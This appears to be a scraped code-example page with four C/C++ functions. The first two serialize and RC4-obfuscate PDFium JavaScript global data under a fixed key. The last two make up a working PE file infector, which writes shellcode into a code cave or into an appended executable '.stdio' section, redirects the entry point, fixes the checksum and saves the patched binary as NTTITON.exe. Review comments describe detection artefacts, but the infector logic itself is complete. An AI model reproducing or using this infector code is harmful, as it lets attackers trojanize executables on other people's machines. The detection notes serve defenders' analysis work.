Exemplo n.º 1
// Serializes every element of m_arrayGlobalData flagged bPersistent and
// writes the result to m_sFilePath.
//
// Buffer layout before the RC4 pass (each integer is appended as its raw
// in-memory bytes, so presumably host byte order):
//   uint16_t  type marker, ('X' << 8) | 'F'
//   uint16_t  format version, 2
//   uint32_t  number of serialized elements
//   uint32_t  payload size in bytes
//   bytes     concatenated element records
//
// Serialization stops at the first element that would push the payload past
// JS_MAXGLOBALDATA; that element and all later ones are not saved.
//
// NOTE(security): the whole buffer, header included, is run through RC4
// keyed with JS_RC4KEY. sizeof(JS_RC4KEY) is taken here, so the key looks
// like a fixed array built into the binary -- TODO confirm. If so, this is
// obfuscation only: it gives no confidentiality against anyone holding the
// binary, and RC4 adds no integrity check, so the code that loads this file
// has to treat its content as untrusted input.
void CJS_GlobalData::SaveGlobalPersisitentVariables() {
  CFX_BinaryBuf sPayload;
  uint32_t nSaved = 0;
  for (const auto& pEntry : m_arrayGlobalData) {
    if (!pEntry->bPersistent)
      continue;

    CFX_BinaryBuf sRecord;
    MakeByteString(pEntry->data.sKey, &pEntry->data, sRecord);

    // Size cap: give up on the rest of the list once the limit is reached.
    if (sPayload.GetSize() + sRecord.GetSize() > JS_MAXGLOBALDATA)
      break;

    sPayload.AppendBlock(sRecord.GetBuffer(), sRecord.GetSize());
    ++nSaved;
  }

  // Fixed-size header values.
  uint16_t wMagic = (uint16_t)(('X' << 8) | 'F');
  uint16_t wFormatVersion = 2;
  uint32_t dwPayloadSize = sPayload.GetSize();

  CFX_BinaryBuf sOutput;
  sOutput.AppendBlock(&wMagic, sizeof(uint16_t));
  sOutput.AppendBlock(&wFormatVersion, sizeof(uint16_t));
  sOutput.AppendBlock(&nSaved, sizeof(uint32_t));
  sOutput.AppendBlock(&dwPayloadSize, sizeof(uint32_t));
  sOutput.AppendBlock(sPayload.GetBuffer(), sPayload.GetSize());

  // In-place RC4 over header and payload, then write to disk.
  CRYPT_ArcFourCryptBlock(sOutput.GetBuffer(), sOutput.GetSize(), JS_RC4KEY,
                          sizeof(JS_RC4KEY));
  WriteFileBuffer(m_sFilePath.c_str(), (const FX_CHAR*)sOutput.GetBuffer(),
                  sOutput.GetSize());
}
Exemplo n.º 2
// Serializes every element of m_arrayGlobalData flagged bPersistent and
// writes the result to m_sFilePath.
//
// Buffer layout before the RC4 pass (each integer is appended as its raw
// in-memory bytes, so presumably host byte order):
//   FX_WORD   type marker, ('X' << 8) | 'F'
//   FX_WORD   format version, 2
//   FX_DWORD  number of serialized elements
//   FX_DWORD  payload size in bytes
//   bytes     concatenated element records
//
// Serialization stops at the first element that would push the payload past
// JS_MAXGLOBALDATA; that element and all later ones are not saved.
//
// NOTE(security): the whole buffer, header included, is run through RC4
// keyed with JS_RC4KEY. sizeof(JS_RC4KEY) is taken here, so the key looks
// like a fixed array built into the binary -- TODO confirm. If so, this is
// obfuscation only: it gives no confidentiality against anyone holding the
// binary, and RC4 adds no integrity check, so the code that loads this file
// has to treat its content as untrusted input.
void CJS_GlobalData::SaveGlobalPersisitentVariables() {
  CFX_BinaryBuf sPayload;
  FX_DWORD nSaved = 0;

  const int nTotal = m_arrayGlobalData.GetSize();
  for (int idx = 0; idx < nTotal; ++idx) {
    CJS_GlobalData_Element* pEntry = m_arrayGlobalData.GetAt(idx);
    if (!pEntry->bPersistent)
      continue;

    CFX_BinaryBuf sRecord;
    MakeByteString(pEntry->data.sKey, &pEntry->data, sRecord);

    // Size cap: give up on the rest of the list once the limit is reached.
    if (sPayload.GetSize() + sRecord.GetSize() > JS_MAXGLOBALDATA)
      break;

    sPayload.AppendBlock(sRecord.GetBuffer(), sRecord.GetSize());
    ++nSaved;
  }

  // Fixed-size header values.
  FX_WORD wMagic = (FX_WORD)(('X' << 8) | 'F');
  FX_WORD wFormatVersion = 2;
  FX_DWORD dwPayloadSize = sPayload.GetSize();

  CFX_BinaryBuf sOutput;
  sOutput.AppendBlock(&wMagic, sizeof(FX_WORD));
  sOutput.AppendBlock(&wFormatVersion, sizeof(FX_WORD));
  sOutput.AppendBlock(&nSaved, sizeof(FX_DWORD));
  sOutput.AppendBlock(&dwPayloadSize, sizeof(FX_DWORD));
  sOutput.AppendBlock(sPayload.GetBuffer(), sPayload.GetSize());

  // In-place RC4 over header and payload, then write to disk.
  CRYPT_ArcFourCryptBlock(sOutput.GetBuffer(), sOutput.GetSize(), JS_RC4KEY,
                          sizeof(JS_RC4KEY));
  WriteFileBuffer(m_sFilePath.c_str(), (const FX_CHAR*)sOutput.GetBuffer(),
                  sOutput.GetSize());
}
Exemplo n.º 3
// Entry point of a PE file patcher: loads the file named by argv[1] into
// memory, places three byte arrays (ucCallCode, ucJMP, ucShellCode -- all
// defined outside this listing) into unused space inside the image, and
// writes the modified image to "NTTITON.exe". If no suitable gap is found it
// falls back to AddSection(), which appends a new section instead.
//
// NOTE(review, defensive): this is the classic "code cave" file-infection
// pattern. For triage, the output differs from the input by executable bytes
// sitting in what was padding, followed by a relative jump back to the
// original entry point. Any modification of this kind changes the file hash
// and invalidates an existing Authenticode signature, so hash allow-listing
// and signature verification both catch the result.
int main(int argc, char* argv[])
{
	void* lpBuffer = 0;
	// Presumably reads the whole file into a freshly allocated buffer and
	// returns its size -- CreateFileBuffer is not shown here.
	unsigned long ulBuffer = CreateFileBuffer(argv[1], &lpBuffer);

	if (lpBuffer)
	{
		if (ulBuffer)
		{
			unsigned long ulCodeCave = 0;
			CodeCave sCodeCave = {0};


			// Assignment inside the condition is intentional: a non-zero
			// result means a gap of at least sizeof(ucShellCode)+10 bytes
			// was found and described in sCodeCave.
			if (ulCodeCave = ScanCodeCave(&sCodeCave, lpBuffer,ulBuffer,sizeof(ucShellCode)+10))
			{
				unsigned long ulOffset = 0;

				// Layout written into the gap: ucCallCode, then ucJMP, then
				// ucShellCode.
				m_memcpy((void*)(sCodeCave.ulAddress), ucCallCode, sizeof(ucCallCode));
				// Relative displacement from the end of the jump back to
				// sCodeCave.ulEntryPoint; the 5 is presumably the length of
				// the jump instruction held in ucJMP.
				ulOffset = sCodeCave.ulEntryPoint - (sCodeCave.ulVirtualAddress + sCodeCave.ulVirtualAddressOffset + sizeof(ucCallCode)) - 5;
				// Patches the displacement into the shared ucJMP array
				// (byte 0 is left untouched).
				m_memcpy(&ucJMP[1],&ulOffset, sizeof(unsigned long));
				m_memcpy((void*)(sCodeCave.ulAddress + sizeof(ucCallCode)), ucJMP,sizeof(ucJMP));
				m_memcpy((void*)(sCodeCave.ulAddress + sizeof(ucCallCode) + sizeof(ucJMP)), ucShellCode, sizeof(ucShellCode));


				// The patched image is written under a fixed output name;
				// success is judged by the returned byte count.
				if (WriteFileBuffer("NTTITON.exe", lpBuffer,ulBuffer) == ulBuffer)
				{
					printf("Done\n");
				}

			}
			else
			{
				// No gap large enough: append a new section instead.
				AddSection(lpBuffer,ulBuffer, sizeof(ucShellCode) + 10);
			}
		}
		VirtualFree(lpBuffer,ulBuffer,MEM_RELEASE);
	}
	return 0;
}
Exemplo n.º 4
// Builds a copy of the PE image in lpModule with one extra section appended,
// fills that section with ucCallCode + ucJMP + ucShellCode (defined outside
// this listing), points the entry point at it, and writes the result to
// "NTTITON.exe".
//
// Parameters:
//   lpModule  - in-memory copy of the original file.
//   ulModule  - size of that copy in bytes.
//   ulRawSize - bytes requested for the new section (rounded up to
//               FileAlignment for the on-disk size).
//
// NOTE(review, defensive): the artefacts this leaves in the output are all
// visible to static PE inspection -- a trailing section named ".stdio" with
// CODE|EXECUTE|READ characteristics, AddressOfEntryPoint equal to that last
// section's VirtualAddress, an incremented NumberOfSections and enlarged
// SizeOfImage. The header CheckSum is recomputed below, so a checksum
// mismatch will not flag the file; an Authenticode signature and any
// recorded file hash still will, because the signed content changes.
void AddSection(void* lpModule, unsigned long ulModule, unsigned long ulRawSize)
{
	PIMAGE_DOS_HEADER lpDos = (PIMAGE_DOS_HEADER)(lpModule);
	PIMAGE_NT_HEADERS lpNt = (PIMAGE_NT_HEADERS)((unsigned long)lpDos + lpDos->e_lfanew);

	// Only proceed for a buffer carrying the "PE\0\0" signature.
	if (lpNt->Signature == IMAGE_NT_SIGNATURE)
	{
		// Output size = original size + new section rounded to FileAlignment.
		unsigned long ulNewImageSize = ulModule + CalculateBoundary(lpNt->OptionalHeader.FileAlignment, ulRawSize);
		if (ulNewImageSize)
		{

			// 0x40 is PAGE_EXECUTE_READWRITE.
			void * lpNewBase = VirtualAlloc(NULL,ulNewImageSize,MEM_COMMIT|MEM_RESERVE,0x40);

			if (lpNewBase)
			{
				// Header of the current last section inside the NEW buffer;
				// 40 is the size of one IMAGE_SECTION_HEADER. The new header
				// slot is the one directly after it.
				PIMAGE_SECTION_HEADER lpLastSection = (PIMAGE_SECTION_HEADER)((unsigned long)lpNewBase + lpDos->e_lfanew + sizeof(IMAGE_NT_HEADERS) + ((lpNt->FileHeader.NumberOfSections-1)*40));
				PIMAGE_SECTION_HEADER lpNewSection = (PIMAGE_SECTION_HEADER)((unsigned long)lpLastSection + sizeof(IMAGE_SECTION_HEADER));

				unsigned long ulEOF = 0;
				unsigned long ulCheckSum = 0;
				unsigned long ulOldCheckSum = 0;
				unsigned long ulEntryPoint = 0;
				unsigned long ulOffset = 0;


				// From here on lpNt refers to the headers in the new buffer.
				lpNt = (PIMAGE_NT_HEADERS)((unsigned long)lpNewBase+ lpDos->e_lfanew);

				RtlSecureZeroMemory(lpNewBase,ulNewImageSize);

				// Copy the original image, then write the new section name.
				m_memcpy(lpNewBase,lpModule,ulModule);
				m_memcpy(&lpNewSection->Name, ".stdio", strlen(".stdio"));


				// New section header: raw and virtual placement follow the
				// previous last section, aligned to FileAlignment and
				// SectionAlignment respectively; marked as executable code.
				lpNewSection->SizeOfRawData = CalculateBoundary(lpNt->OptionalHeader.FileAlignment,ulRawSize);
				lpNewSection->PointerToRawData = CalculateBoundary(lpNt->OptionalHeader.FileAlignment, lpLastSection->PointerToRawData + lpLastSection->SizeOfRawData);
				lpNewSection->VirtualAddress = CalculateBoundary(lpNt->OptionalHeader.SectionAlignment, lpLastSection->VirtualAddress + lpLastSection->Misc.VirtualSize);
				lpNewSection->Characteristics = (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ);
				lpNewSection->Misc.VirtualSize = ulRawSize;
				lpNt->FileHeader.NumberOfSections++;
				lpNt->OptionalHeader.SizeOfImage = CalculateBoundary(lpNt->OptionalHeader.SectionAlignment, lpNewSection->VirtualAddress + ulRawSize);




				// Remember the original entry point so the jump can return
				// to it.
				ulEntryPoint = lpNt->OptionalHeader.AddressOfEntryPoint;


				// Section content: ucCallCode, then ucJMP with its
				// displacement patched to the original entry point (the 5 is
				// presumably the jump instruction length), then ucShellCode.
				m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData), ucCallCode, sizeof(ucCallCode));
				ulOffset = ulEntryPoint - (lpNewSection->VirtualAddress + sizeof(ucCallCode)) - 5;
				m_memcpy(&ucJMP[1],&ulOffset, sizeof(unsigned long));
				m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData + sizeof(ucCallCode)), ucJMP,sizeof(ucJMP));
				m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData + sizeof(ucCallCode) + sizeof(ucJMP)), ucShellCode, sizeof(ucShellCode));

				// Assignment inside the condition is intentional. GetEOFSize
				// is not shown; presumably it returns the number of bytes
				// that trail the last section in the original file, which
				// are then re-appended after the new section.
				if (ulEOF = GetEOFSize(lpLastSection, ulModule))
				{
					m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData + lpNewSection->SizeOfRawData), (void*)((unsigned long)lpModule + (lpLastSection->PointerToRawData + lpLastSection->SizeOfRawData)), ulEOF);
				}

				// Execution now starts in the new section.
				lpNt->OptionalHeader.AddressOfEntryPoint = (lpNewSection->VirtualAddress);

				// Recompute the PE header checksum over the modified image
				// and store it.
				if (CheckSumMappedFile(lpNewBase,ulNewImageSize, &ulOldCheckSum, &ulCheckSum))
				{

					lpNt->OptionalHeader.CheckSum = ulCheckSum;
				}



				// Same fixed output name as the code-cave path in main().
				if (WriteFileBuffer("NTTITON.exe",lpNewBase,ulNewImageSize))
				{
					printf("Had to add section.... no codecaves were available FUUUUCK\n");
				}



				VirtualFree(lpNewBase,ulNewImageSize,MEM_RELEASE);
			}
		}
	}
}